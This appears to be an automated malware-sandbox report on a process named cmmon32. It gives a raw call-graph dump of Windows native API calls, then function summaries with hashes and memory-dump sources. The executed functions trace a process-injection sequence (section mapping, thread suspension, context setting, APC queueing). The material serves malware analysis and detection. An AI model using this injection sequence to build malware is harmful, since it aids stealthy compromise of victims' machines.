2caaef0 LdrLoadDll 108290->108521 108437 2caad60 108292->108437 108294 2cab238 108516 2ca9eb0 108294->108516 108298 2ca9f0c 108297->108298 108299 2caaf50 LdrLoadDll 108297->108299 108547 4c32c0a 108298->108547 108299->108298 108300 2ca9f27 108302 2cabdb0 108300->108302 108303 2cab349 108302->108303 108550 2caa660 108302->108550 108303->108177 108306 2caaf50 LdrLoadDll 108305->108306 108307 2ca4b34 108306->108307 108307->108245 108307->108246 108307->108247 108309 2caa36c NtCreateFile 108308->108309 108310 2caaf50 LdrLoadDll 108308->108310 108309->108250 108310->108309 108312 2ca46fc 108311->108312 108313 2caa2d0 LdrLoadDll 108312->108313 108314 2ca471d 108313->108314 108315 2ca4738 108314->108315 108316 2ca4724 108314->108316 108318 2caa480 2 API calls 108315->108318 108317 2caa480 2 API calls 108316->108317 108319 2ca472d 108317->108319 108320 2ca4741 108318->108320 108319->108273 108375 2cabfc0 LdrLoadDll RtlAllocateHeap 108320->108375 108322 2ca474c 108322->108273 108324 2ca444b 108323->108324 108325 2ca447e 108323->108325 108326 2caa2d0 LdrLoadDll 108324->108326 108327 2ca45c9 108325->108327 108330 2ca449a 108325->108330 108328 2ca4466 108326->108328 108329 2caa2d0 LdrLoadDll 108327->108329 108331 2caa480 2 API calls 108328->108331 108335 2ca45e4 108329->108335 108332 2caa2d0 LdrLoadDll 108330->108332 108333 2ca446f 108331->108333 108334 2ca44b5 108332->108334 108333->108276 108337 2ca44bc 108334->108337 108338 2ca44d1 108334->108338 108388 2caa310 LdrLoadDll 108335->108388 108340 2caa480 2 API calls 108337->108340 108341 2ca44ec 108338->108341 108342 2ca44d6 108338->108342 108339 2ca461e 108343 2caa480 2 API calls 108339->108343 108344 2ca44c5 108340->108344 108350 2ca44f1 108341->108350 108376 2cabf80 108341->108376 108345 2caa480 2 API calls 108342->108345 108346 2ca4629 108343->108346 108344->108276 108347 2ca44df 108345->108347 108346->108276 108347->108276 108359 2ca4503 108350->108359 108379 2caa400 108350->108379 108351 2ca4557 108352 2ca456e 108351->108352 108387 2caa290 LdrLoadDll 108351->108387 108354 2ca458a 108352->108354 108355 2ca4575 108352->108355 108356 2caa480 2 API calls 108354->108356 108357 2caa480 2 API calls 108355->108357 108358 2ca4593 108356->108358 108357->108359 108360 2ca45bf 108358->108360 108382 2cabb80 108358->108382 108359->108276 108360->108276 108362 2ca45aa 108363 2cabdb0 2 API calls 108362->108363 108364 2ca45b3 108363->108364 108364->108276 108365->108245 108366->108272 108368 2ca4d04 108367->108368 108369 2caaf50 LdrLoadDll 108367->108369 108370 2caa310 LdrLoadDll 108368->108370 108369->108368 108370->108275 108372 2caaf50 LdrLoadDll 108371->108372 108373 2caa49c NtClose 108372->108373 108373->108278 108374->108258 108375->108322 108389 2caa620 108376->108389 108378 2cabf98 108378->108350 108380 2caa41c NtReadFile 108379->108380 108381 2caaf50 LdrLoadDll 108379->108381 108380->108351 108381->108380 108383 2cabb8d 108382->108383 108384 2cabba4 108382->108384 108383->108384 108385 2cabf80 2 API calls 108383->108385 108384->108362 108386 2cabbbb 108385->108386 108386->108362 108387->108352 108388->108339 108390 2caaf50 LdrLoadDll 108389->108390 108391 2caa63c RtlAllocateHeap 108390->108391 108391->108378 108393 2cabd5d 108392->108393 108522 2caa530 108392->108522 108393->108283 108396 2ca4071 108395->108396 108397 2ca4079 108395->108397 108396->108286 108398 2ca434c 108397->108398 108525 2cacf20 108397->108525 108398->108286 108400 2ca40cd 108401 2cacf20 2 API calls 108400->108401 108404 2ca40d8 108401->108404 108402 2ca4126 108405 2cacf20 2 API calls 108402->108405 108404->108402 108533 2cacfc0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 108404->108533 108534 2cad050 108404->108534 108408 2ca413a 108405->108408 108407 2ca4197 108409 2cacf20 2 API calls 108407->108409 108408->108407 108411 2cad050 3 API calls 108408->108411 108410 2ca41ad 108409->108410 108412 2ca41ea 108410->108412 108414 2cad050 3 API calls 108410->108414 108411->108408 108413 2cacf20 2 API calls 108412->108413 108415 2ca41f5 108413->108415 108414->108410 108416 2cad050 3 API calls 108415->108416 108423 2ca422f 108415->108423 108416->108415 108419 2cacf80 2 API calls 108420 2ca432e 108419->108420 108421 2cacf80 2 API calls 108420->108421 108422 2ca4338 108421->108422 108424 2cacf80 2 API calls 108422->108424 108530 2cacf80 108423->108530 108425 2ca4342 108424->108425 108426 2cacf80 2 API calls 108425->108426 108426->108398 108428 2ca5391 108427->108428 108429 2ca4a40 8 API calls 108428->108429 108431 2ca53a7 108429->108431 108430 2ca53fa 108430->108290 108431->108430 108432 2ca53e2 108431->108432 108433 2ca53f5 108431->108433 108434 2cabdb0 2 API calls 108432->108434 108435 2cabdb0 2 API calls 108433->108435 108436 2ca53e7 108434->108436 108435->108430 108436->108290 108438 2caad74 108437->108438 108439 2caac20 LdrLoadDll 108437->108439 108540 2caac20 108438->108540 108439->108438 108442 2caac20 LdrLoadDll 108443 2caad86 108442->108443 108444 2caac20 LdrLoadDll 108443->108444 108445 2caad8f 108444->108445 108446 2caac20 LdrLoadDll 108445->108446 108447 2caad98 108446->108447 108448 2caac20 LdrLoadDll 108447->108448 108449 2caada1 108448->108449 108450 2caac20 LdrLoadDll 108449->108450 108451 2caadad 108450->108451 108452 2caac20 LdrLoadDll 108451->108452 108453 2caadb6 108452->108453 108454 2caac20 LdrLoadDll 108453->108454 108455 2caadbf 108454->108455 108456 2caac20 LdrLoadDll 108455->108456 108457 2caadc8 108456->108457 108458 2caac20 LdrLoadDll 108457->108458 108459 2caadd1 108458->108459 108460 2caac20 LdrLoadDll 108459->108460 108461 2caadda 108460->108461 108462 2caac20 LdrLoadDll 108461->108462 108463 2caade6 108462->108463 108464 2caac20 LdrLoadDll 108463->108464 108465 2caadef 108464->108465 108466 2caac20 LdrLoadDll 108465->108466 108467 2caadf8 108466->108467 108468 2caac20 LdrLoadDll 108467->108468 108469 2caae01 108468->108469 108470 2caac20 LdrLoadDll 108469->108470 108471 2caae0a 108470->108471 108472 2caac20 LdrLoadDll 108471->108472 108473 2caae13 108472->108473 108474 2caac20 LdrLoadDll 108473->108474 108475 2caae1f 108474->108475 108476 2caac20 LdrLoadDll 108475->108476 108477 2caae28 108476->108477 108478 2caac20 LdrLoadDll 108477->108478 108479 2caae31 108478->108479 108480 2caac20 LdrLoadDll 108479->108480 108481 2caae3a 108480->108481 108482 2caac20 LdrLoadDll 108481->108482 108483 2caae43 108482->108483 108484 2caac20 LdrLoadDll 108483->108484 108485 2caae4c 108484->108485 108486 2caac20 LdrLoadDll 108485->108486 108487 2caae58 108486->108487 108488 2caac20 LdrLoadDll 108487->108488 108489 2caae61 108488->108489 108490 2caac20 LdrLoadDll 108489->108490 108491 2caae6a 108490->108491 108492 2caac20 LdrLoadDll 108491->108492 108493 2caae73 108492->108493 108494 2caac20 LdrLoadDll 108493->108494 108495 2caae7c 108494->108495 108496 2caac20 LdrLoadDll 108495->108496 108497 2caae85 108496->108497 108498 2caac20 LdrLoadDll 108497->108498 108499 2caae91 108498->108499 108500 2caac20 LdrLoadDll 108499->108500 108501 2caae9a 108500->108501 108502 2caac20 LdrLoadDll 108501->108502 108503 2caaea3 108502->108503 108504 2caac20 LdrLoadDll 108503->108504 108505 2caaeac 108504->108505 108506 2caac20 LdrLoadDll 108505->108506 108507 2caaeb5 108506->108507 108508 2caac20 LdrLoadDll 108507->108508 108509 2caaebe 108508->108509 108510 2caac20 LdrLoadDll 108509->108510 108511 2caaeca 108510->108511 108512 2caac20 LdrLoadDll 108511->108512 108513 2caaed3 108512->108513 108514 2caac20 LdrLoadDll 108513->108514 108515 2caaedc 108514->108515 108515->108294 108517 2caaf50 LdrLoadDll 108516->108517 108518 2ca9ecc 108517->108518 108546 4c32df0 LdrInitializeThunk 108518->108546 108519 2ca9ee3 108519->108215 108521->108292 108523 2caaf50 LdrLoadDll 108522->108523 108524 2caa54c NtAllocateVirtualMemory 108523->108524 108524->108393 108526 2cacf30 108525->108526 108527 2cacf36 108525->108527 108526->108400 108528 2cabf80 2 API calls 108527->108528 108529 2cacf5c 108528->108529 108529->108400 108531 2cabdb0 2 API calls 108530->108531 108532 2ca4324 108531->108532 108532->108419 108533->108404 108535 2cacfc0 108534->108535 108536 2cabf80 2 API calls 108535->108536 108537 2cad01d 108535->108537 108538 2cacffa 108536->108538 108537->108404 108539 2cabdb0 2 API calls 108538->108539 108539->108537 108541 2caac3b 108540->108541 108542 2ca4e40 LdrLoadDll 108541->108542 108543 2caac5b 108542->108543 108544 2ca4e40 LdrLoadDll 108543->108544 108545 2caad07 108543->108545 108544->108545 108545->108442 108546->108519 108548 4c32c11 108547->108548 108549 4c32c1f LdrInitializeThunk 108547->108549 108548->108300 108549->108300 108551 2caaf50 LdrLoadDll 108550->108551 108552 2caa67c RtlFreeHeap 108551->108552 108552->108303 108554 2c97eab 108553->108554 108555 2c97eb0 108553->108555 108554->108223 108556 2cabd30 2 API calls 108555->108556 108559 2c97ed5 108556->108559 108557 2c97f38 108557->108223 108558 2ca9eb0 2 API calls 108558->108559 108559->108557 108559->108558 108560 2c97f3e 108559->108560 108565 2cabd30 2 API calls 108559->108565 108569 2caa5b0 108559->108569 108562 2c97f64 108560->108562 108563 2caa5b0 2 API calls 108560->108563 108562->108223 108564 2c97f55 108563->108564 108564->108223 108565->108559 108567 2c9817e 108566->108567 108568 2caa5b0 2 API calls 108566->108568 108567->108179 108568->108567 108570 2caa5cc 108569->108570 108571 2caaf50 LdrLoadDll 108569->108571 108574 4c32c70 LdrInitializeThunk 108570->108574 108571->108570 108572 2caa5e3 108572->108559 108574->108572 108576 2cab5b3 108575->108576 108579 2c9ace0 108576->108579 108580 2c9ad04 108579->108580 108581 2c9ad40 LdrLoadDll 108580->108581 108582 2c99c3a 108580->108582 108581->108582 108582->108186 108585 2c9b053 108583->108585 108584 2c9b0d0 108584->108193 108585->108584 108598 2ca9c80 LdrLoadDll 108585->108598 108588 2caaf50 LdrLoadDll 108587->108588 108589 2c9f1ab 108588->108589 108589->108195 108590 2caa7c0 108589->108590 108591 2caaf50 LdrLoadDll 108590->108591 108592 2caa7df LookupPrivilegeValueW 108591->108592 108592->108198 108594 2caa26c 108593->108594 108595 2caaf50 LdrLoadDll 108593->108595 108599 4c32ea0 LdrInitializeThunk 108594->108599 108595->108594 108596 2caa28b 108596->108199 108598->108584 108599->108596 108601 2c9b1e0 108600->108601 108602 2c9b030 LdrLoadDll 108601->108602 108603 2c9b1f4 108602->108603 108603->108132 108605 2c9af24 108604->108605 108677 2ca9c80 LdrLoadDll 108605->108677 108607 2c9af5e 108607->108134 108609 2c9f39c 108608->108609 108610 2c9b1b0 LdrLoadDll 108609->108610 108611 2c9f3ae 108610->108611 108678 2c9f280 108611->108678 108614 2c9f3c9 108616 2c9f3d4 108614->108616 108618 2caa480 2 API calls 108614->108618 108615 2c9f3e1 108617 2c9f3f2 108615->108617 108619 2caa480 2 API calls 108615->108619 108616->108137 108617->108137 108618->108616 108619->108617 108621 2c9f42c 108620->108621 108697 2c9b2a0 108621->108697 108623 2c9f43e 108624 2c9f280 3 API calls 108623->108624 108625 2c9f44f 108624->108625 108626 2c9f459 108625->108626 108627 2c9f471 108625->108627 108628 2c9f464 108626->108628 108630 2caa480 2 API calls 108626->108630 108629 2c9f482 108627->108629 108631 2caa480 2 API calls 108627->108631 108628->108139 108629->108139 108630->108628 108631->108629 108633 2c9ca96 108632->108633 108634 2c9caa0 108632->108634 108633->108148 108635 2c9af00 LdrLoadDll 108634->108635 108636 2c9cb3e 108635->108636 108637 2c9cb64 108636->108637 108638 2c9b030 LdrLoadDll 108636->108638 108637->108148 108639 2c9cb80 108638->108639 108640 2ca4a40 8 API calls 108639->108640 108641 2c9cbd5 108640->108641 108641->108148 108643 2c9d636 108642->108643 108644 2c9b030 LdrLoadDll 108643->108644 108645 2c9d64a 108644->108645 108701 2c9d300 108645->108701 108647 2c9908b 108648 2c9cbf0 108647->108648 108649 2c9cc16 108648->108649 108650 2c9b030 LdrLoadDll 108649->108650 108651 2c9cc99 108649->108651 108650->108651 108652 2c9b030 LdrLoadDll 108651->108652 108653 2c9cd06 108652->108653 108654 2c9af00 LdrLoadDll 108653->108654 108655 2c9cd6f 108654->108655 108656 2c9b030 LdrLoadDll 108655->108656 108657 2c9ce1f 108656->108657 108657->108161 108731 2c9f6c0 108658->108731 108660 2c98d14 108671 2c98f25 108660->108671 108736 2ca4390 108660->108736 108662 2c98d70 108662->108671 108739 2c98ab0 108662->108739 108665 2cacf20 2 API calls 108666 2c98db2 108665->108666 108667 2cad050 3 API calls 108666->108667 108674 2c98dc7 108667->108674 108668 2c97ea0 4 API calls 108668->108674 108671->108117 108672 2c9c7a0 18 API calls 108672->108674 108673 2c98160 2 API calls 108673->108674 108674->108668 108674->108671 108674->108672 108674->108673 108744 2c9f660 108674->108744 108748 2c9f070 21 API calls 108674->108748 108675->108141 108676->108159 108677->108607 108679 2c9f29a 108678->108679 108680 2c9f350 108678->108680 108681 2c9b030 LdrLoadDll 108679->108681 108680->108614 108680->108615 108682 2c9f2bc 108681->108682 108688 2ca9f30 108682->108688 108684 2c9f2fe 108691 2ca9f70 108684->108691 108687 2caa480 2 API calls 108687->108680 108689 2caaf50 LdrLoadDll 108688->108689 108690 2ca9f4c 108689->108690 108690->108684 108692 2caaf50 LdrLoadDll 108691->108692 108693 2ca9f8c 108692->108693 108696 4c335c0 LdrInitializeThunk 108693->108696 108694 2c9f344 108694->108687 108696->108694 108698 2c9b2c7 108697->108698 108699 2c9b030 LdrLoadDll 108698->108699 108700 2c9b303 108699->108700 108700->108623 108702 2c9d317 108701->108702 108710 2c9f700 108702->108710 108707 2c9d392 108707->108647 108709 2c9d3a5 108709->108647 108711 2c9f725 108710->108711 108723 2c981a0 108711->108723 108713 2c9d35f 108718 2caa6d0 108713->108718 108714 2c9f749 108714->108713 108715 2ca4a40 8 API calls 108714->108715 108717 2cabdb0 2 API calls 108714->108717 108730 2c9f540 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 108714->108730 108715->108714 108717->108714 108719 2caa6ef CreateProcessInternalW 108718->108719 108720 2caaf50 LdrLoadDll 108718->108720 108721 2c9d38b 108719->108721 108720->108719 108721->108707 108722 2caa290 LdrLoadDll 108721->108722 108722->108709 108724 2c9829f 108723->108724 108725 2c981b5 108723->108725 108724->108714 108725->108724 108726 2ca4a40 8 API calls 108725->108726 108728 2c98222 108726->108728 108727 2c98249 108727->108714 108728->108727 108729 2cabdb0 2 API calls 108728->108729 108729->108727 108730->108714 108732 2ca4e40 LdrLoadDll 108731->108732 108733 2c9f6df 108732->108733 108734 2c9f6ed 108733->108734 108735 2c9f6e6 SetErrorMode 108733->108735 108734->108660 108735->108734 108738 2ca43b6 108736->108738 108749 2c9f490 108736->108749 108738->108662 108740 2cabd30 2 API calls 108739->108740 108743 2c98ad5 108739->108743 108740->108743 108741 2c98cea 108741->108665 108743->108741 108768 2ca9870 108743->108768 108745 2c9f673 108744->108745 108817 2ca9e80 108745->108817 108748->108674 108750 2c9f4ad 108749->108750 108756 2ca9fb0 108750->108756 108753 2c9f4f5 108753->108738 108757 2ca9fcc 108756->108757 108758 2caaf50 LdrLoadDll 108756->108758 108766 4c32f30 LdrInitializeThunk 108757->108766 108758->108757 108759 2c9f4ee 108759->108753 108761 2caa000 108759->108761 108762 2caaf50 LdrLoadDll 108761->108762 108763 2caa01c 108762->108763 108767 4c32d10 LdrInitializeThunk 108763->108767 108764 2c9f51e 108764->108738 108766->108759 108767->108764 108769 2cabf80 2 API calls 108768->108769 108770 2ca9887 108769->108770 108789 2c99310 108770->108789 108772 2ca98a2 108773 2ca98c9 108772->108773 108774 2ca98e0 108772->108774 108775 2cabdb0 2 API calls 108773->108775 108776 2cabd30 2 API calls 108774->108776 108777 2ca98d6 108775->108777 108778 2ca991a 108776->108778 108777->108741 108779 2cabd30 2 API calls 108778->108779 108780 2ca9933 108779->108780 108786 2ca9bd4 108780->108786 108795 2cabd70 LdrLoadDll 108780->108795 108782 2ca9bb9 108783 2ca9bc0 108782->108783 108782->108786 108784 2cabdb0 2 API calls 108783->108784 108785 2ca9bca 108784->108785 108785->108741 108787 2cabdb0 2 API calls 108786->108787 108788 2ca9c29 108787->108788 108788->108741 108790 2c99335 108789->108790 108791 2c9ace0 LdrLoadDll 108790->108791 108792 2c99368 108791->108792 108794 2c9938d 108792->108794 108796 2c9cf10 108792->108796 108794->108772 108795->108782 108797 2c9cf3c 108796->108797 108798 2caa1d0 LdrLoadDll 108797->108798 108799 2c9cf55 108798->108799 108800 2c9cf5c 108799->108800 108807 2caa210 108799->108807 108800->108794 108804 2c9cf97 108805 2caa480 2 API calls 108804->108805 108806 2c9cfba 108805->108806 108806->108794 108808 2caa22c 108807->108808 108809 2caaf50 LdrLoadDll 108807->108809 108816 4c32ca0 LdrInitializeThunk 108808->108816 108809->108808 108810 2c9cf7f 108810->108800 108812 2caa800 108810->108812 108813 2caa80d 108812->108813 108814 2caaf50 LdrLoadDll 108813->108814 108815 2caa81f 108814->108815 108815->108804 108816->108810 108818 2caaf50 LdrLoadDll 108817->108818 108819 2ca9e9c 108818->108819 108822 4c32dd0 LdrInitializeThunk 108819->108822 108820 2c9f69e 108820->108674 108822->108820 108823 4adcb84 108826 4ada042 108823->108826 108825 4adcba5 108827 4ada06b 108826->108827 108828 4ada182 NtQueryInformationProcess 108827->108828 108843 4ada56c 108827->108843 108830 4ada1ba 108828->108830 108829 4ada1ef 108829->108825 108830->108829 108831 4ada2db 108830->108831 108832 4ada290 108830->108832 108833 4ada2fc NtSuspendThread 108831->108833 108855 4ad9de2 NtCreateSection NtMapViewOfSection NtClose 108832->108855 108834 4ada30d 108833->108834 108837 4ada331 108833->108837 108834->108825 108836 4ada2cf 108836->108825 108840 4ada412 108837->108840 108846 4ad9bb2 108837->108846 108839 4ada531 108842 4ada552 NtResumeThread 108839->108842 108840->108839 108841 4ada4a6 NtSetContextThread 108840->108841 108845 4ada4bd 108841->108845 108842->108843 108843->108825 108844 4ada51c RtlQueueApcWow64Thread 108844->108839 108845->108839 108845->108844 108847 4ad9bf7 108846->108847 108848 4ad9c66 NtCreateSection 108847->108848 108849 4ad9d4e 108848->108849 108850 4ad9ca0 108848->108850 108849->108840 108851 4ad9cc1 NtMapViewOfSection 108850->108851 108851->108849 108852 4ad9d0c 108851->108852 108852->108849 108853 4ad9d88 108852->108853 108854 4ad9dc5 NtClose 108853->108854 108854->108840 108855->108836 108856 2ca9070 108857 2cabd30 2 API calls 108856->108857 108859 2ca90ab 108857->108859 108858 2ca918c 108859->108858 108860 2c9ace0 LdrLoadDll 108859->108860 108861 2ca90e1 108860->108861 108862 2ca4e40 LdrLoadDll 108861->108862 108864 2ca90fd 108862->108864 108863 2ca9110 Sleep 108863->108864 108864->108858 108864->108863 108867 2ca8c90 LdrLoadDll 108864->108867 108868 2ca8ea0 LdrLoadDll 108864->108868 108867->108864 108868->108864

                                                          Executed Functions

                                                          Function 04ADA036 Relevance: 11.0, APIs: 5, Strings: 1, Instructions: 481nativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • NtQueryInformationProcess.NTDLL ref: 04ADA19F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3733855930.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AD0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_4ad0000_cmmon32.jbxd
                                                          Similarity
                                                          • API ID: InformationProcessQuery
                                                          • String ID: 0
                                                          • API String ID: 1778838933-4108050209
                                                          • Opcode ID: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
                                                          • Instruction ID: 30d77a8122b9a0be4c15d2064dd31e72a998f64ceaeffbc863e0098e3f8e25da
                                                          • Opcode Fuzzy Hash: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
                                                          • Instruction Fuzzy Hash: 0DF10074518A8C8FDBA5EF68C894AEEB7E0FF98304F40462AD44BD7254DF34A545CB41
                                                          Function 04AD9BAF Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 227nativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 303 4ad9baf-4ad9bfe call 4ad9102 306 4ad9c0c-4ad9c9a call 4adb942 * 2 NtCreateSection 303->306 307 4ad9c00 303->307 313 4ad9d5a-4ad9d68 306->313 314 4ad9ca0-4ad9d0a call 4adb942 NtMapViewOfSection 306->314 308 4ad9c02-4ad9c0a 307->308 308->306 308->308 317 4ad9d0c-4ad9d4c 314->317 318 4ad9d52 314->318 320 4ad9d4e-4ad9d4f 317->320 321 4ad9d69-4ad9d6b 317->321 318->313 320->318 322 4ad9d6d-4ad9d72 321->322 323 4ad9d88-4ad9ddc call 4adcd62 NtClose 321->323 324 4ad9d74-4ad9d86 call 4ad9172 322->324 324->323
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3733855930.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AD0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_4ad0000_cmmon32.jbxd
                                                          Similarity
                                                          • API ID: Section$CloseCreateView
                                                          • String ID: @$@
                                                          • API String ID: 1133238012-149943524
                                                          • Opcode ID: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
                                                          • Instruction ID: 3fb0b5f69dc53756ad27d96c275fa6c0ba0fb3f142f5bf1eccd04eb73c32b140
                                                          • Opcode Fuzzy Hash: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
                                                          • Instruction Fuzzy Hash: 79617270518B488FDB58EF68D8856AABBE0FF98314F50062EE58BC3651DF35E441CB86
                                                          Function 04AD9BB2 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 171nativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 362 4ad9bb2-4ad9bef 363 4ad9bf7-4ad9bfe 362->363 364 4ad9bf2 call 4ad9102 362->364 365 4ad9c0c-4ad9c9a call 4adb942 * 2 NtCreateSection 363->365 366 4ad9c00 363->366 364->363 372 4ad9d5a-4ad9d68 365->372 373 4ad9ca0-4ad9d0a call 4adb942 NtMapViewOfSection 365->373 367 4ad9c02-4ad9c0a 366->367 367->365 367->367 376 4ad9d0c-4ad9d4c 373->376 377 4ad9d52 373->377 379 4ad9d4e-4ad9d4f 376->379 380 4ad9d69-4ad9d6b 376->380 377->372 379->377 381 4ad9d6d-4ad9d72 380->381 382 4ad9d88-4ad9ddc call 4adcd62 NtClose 380->382 383 4ad9d74-4ad9d86 call 4ad9172 381->383 383->382
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3733855930.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AD0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_4ad0000_cmmon32.jbxd
                                                          Similarity
                                                          • API ID: Section$CreateView
                                                          • String ID: @$@
                                                          • API String ID: 1585966358-149943524
                                                          • Opcode ID: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
                                                          • Instruction ID: 3e424f4e873533c0e93bbe9b76578c80174db02b195eee603551ed9a0a4bd61c
                                                          • Opcode Fuzzy Hash: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
                                                          • Instruction Fuzzy Hash: 8E517FB0618B088FD758DF58D8956AABBE4FB88314F50062EE58EC3691DF35E441CB86
                                                          Function 04ADA042 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 163nativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • NtQueryInformationProcess.NTDLL ref: 04ADA19F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3733855930.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AD0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_4ad0000_cmmon32.jbxd
                                                          Similarity
                                                          • API ID: InformationProcessQuery
                                                          • String ID: 0
                                                          • API String ID: 1778838933-4108050209
                                                          • Opcode ID: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
                                                          • Instruction ID: dadb893f9530c6aa98e58827c6456c56b877b38b98650f81d1ebdf38d2b16dc4
                                                          • Opcode Fuzzy Hash: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
                                                          • Instruction Fuzzy Hash: 8B512D70918A8C8FDBA9EF68C8946EEBBF4FB98305F40462ED44AD7250DF309645CB41
                                                          Function 02CAA2C2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 130filenativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,02CA4BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02CA4BA7,007A002E,00000000,00000060,00000000,00000000), ref: 02CAA39D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2c90000_cmmon32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID: .z`
                                                          • API String ID: 823142352-1441809116
                                                          • Opcode ID: 5873c37bb1c5ff25daab136cdc266574ff2c640670bc5413e7ec8714bef62449
                                                          • Instruction ID: 803f1469ec9c30cab3238e62a84adaa791ac83f47268158f4a644bc38d340a33
                                                          • Opcode Fuzzy Hash: 5873c37bb1c5ff25daab136cdc266574ff2c640670bc5413e7ec8714bef62449
                                                          • Instruction Fuzzy Hash: A4417FB6604249AFCB08DF98DC95DEB77A9EF88318F14864DF95D97242C631E811CBA0
                                                          Function 02CAA350 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 665 2caa350-2caa366 666 2caa36c-2caa3a1 NtCreateFile 665->666 667 2caa367 call 2caaf50 665->667 667->666
                                                          APIs
                                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,02CA4BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02CA4BA7,007A002E,00000000,00000060,00000000,00000000), ref: 02CAA39D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2c90000_cmmon32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID: .z`
                                                          • API String ID: 823142352-1441809116
                                                          • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                          • Instruction ID: c13c0ec98852f4d61a9be5822d4df95d2ae6a60f0cb9e050bb25a4baed9508f1
                                                          • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                          • Instruction Fuzzy Hash: 9AF0BDB2200208AFCB48CF88DC94EEB77ADAF8C754F158248BA1D97240C630E811CBA4
                                                          Function 02CAA3FA Relevance: 1.5, APIs: 1, Instructions: 37filenativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtReadFile.NTDLL(02CA4D62,5EB65239,FFFFFFFF,02CA4A21,?,?,02CA4D62,?,02CA4A21,FFFFFFFF,5EB65239,02CA4D62,?,00000000), ref: 02CAA445
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2c90000_cmmon32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID:
                                                          • API String ID: 2738559852-0
                                                          • Opcode ID: 30b39373cb24bc4ff630eec34efb854175b89563b936ef07dc1c3e61bab5df50
                                                          • Instruction ID: 378531a5a7a1a234a1586fe673be0c01291461c2504352393f93991fa13879de
                                                          • Opcode Fuzzy Hash: 30b39373cb24bc4ff630eec34efb854175b89563b936ef07dc1c3e61bab5df50
                                                          • Instruction Fuzzy Hash: 29F0A4B2200109AFDB18DF99DC94EEB77A9AF8D354F158649BE1DA7241C630E911CBA0
                                                          Function 02CAA400 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtReadFile.NTDLL(02CA4D62,5EB65239,FFFFFFFF,02CA4A21,?,?,02CA4D62,?,02CA4A21,FFFFFFFF,5EB65239,02CA4D62,?,00000000), ref: 02CAA445
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2c90000_cmmon32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID:
                                                          • API String ID: 2738559852-0
